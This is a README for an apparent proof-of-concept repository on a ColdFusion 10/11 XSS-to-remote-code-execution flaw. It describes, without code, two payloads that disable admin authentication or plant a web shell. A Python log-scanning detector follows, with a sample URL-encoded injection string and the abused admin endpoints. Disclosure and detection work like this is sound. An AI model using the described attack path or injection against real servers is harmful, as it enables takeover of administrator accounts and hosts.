Proof of Concept code for CVE-2015-0345 (APSB15-07)
# ColdFusion 10.x / 11.x XSS -> RCE PoC Exploits

This repo contains XSS vectors for CVE-2015-0345 (APSB15-07) that can be used to gain remote command execution on ColdFusion installations.

This exploit is only valid for ColdFusion 10 and 11 installations. Specifically, ColdFusion 11 Update 11 and ColdFusion 10 Update 16 fix both of these issues. More information on this disclosure can be found here.

## Payload 1

This payload disables the password requirement on the ColdFusion administration panel. If this payload is delivered and run by a ColdFusion administrator, the /CFIDE/administrator directory can be accessed completely, without authentication.


## Payload 2

This payload attempts to upload a CFM shell to ColdFusion by scheduling a task and then modifying the 404 and 500 error templates. If this payload is delivered and run by a ColdFusion administrator, a web shell is then made available at /404.cfm and /500.cfm.

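Log-based detection for the requests these two payloads generate, as an added example that is not part of the PoC repository: it flags a `type` parameter on the file dialog that decodes to something other than a plain keyword, and POSTs to the administrator endpoints the payloads drive (cfadminpassword.cfm, scheduleedit.cfm, server_settings.cfm). It assumes Common Log Format access-log lines; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

FILEDIALOG = "/cfide/administrator/filedialog/index.cfm"
# Administrator endpoints the two payloads drive once the XSS fires.
SENSITIVE_POSTS = {
    "/cfide/administrator/security/cfadminpassword.cfm": "admin auth change",
    "/cfide/administrator/scheduler/scheduleedit.cfm": "scheduled task edit",
    "/cfide/administrator/settings/server_settings.cfm": "error handler change",
}
# `type` should be a short keyword such as "dir"; quotes, braces, parentheses and `$` mean injected JavaScript.
JS_CHARS = re.compile(r"""['"{}()$;]""")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    # Copied payloads are often double-encoded; peel a few layers.
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def classify(line):
    """Return a reason string if the request matches the PoC pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    path = parts.path.lower()
    if path == FILEDIALOG:
        for raw in parse_qs(parts.query, keep_blank_values=True).get("type", []):
            decoded = decode_fully(raw)
            if JS_CHARS.search(decoded) or len(decoded) > 32:  # not a plain keyword
                return "filedialog XSS in type=%r" % decoded[:40]
    if m.group("method") == "POST" and path in SENSITIVE_POSTS:
        return SENSITIVE_POSTS[path]
    return None

def scan(lines):
    """(line_number, reason) for every suspicious request in the log."""
    return [(n, r) for n, r in ((n, classify(l)) for n, l in enumerate(lines, 1)) if r]

# Constructed sample: a benign dialog load, an injected `type`, and the follow-on POST that turns off admin auth.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jun/2015:10:00:01 +0000] "GET /CFIDE/administrator/filedialog/index.cfm?type=dir&fromjscript=true HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Jun/2015:10:00:07 +0000] "GET /CFIDE/administrator/filedialog/index.cfm?type=dir%27%2cexpanded%3a%27x%27%7d%2cfunction%28f%29%7b%7d%29%3b HTTP/1.1" 200 9001',
    '10.0.0.9 - - [11/Jun/2015:10:00:08 +0000] "POST /CFIDE/administrator/security/cfadminpassword.cfm HTTP/1.1" 200 300',
]
```

Running `scan(SAMPLE_LOG)` reports the second and third lines; a legitimate administrator also POSTs to these endpoints, so the POST hits are a correlation signal to pair with the file-dialog hit rather than an alert on their own.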
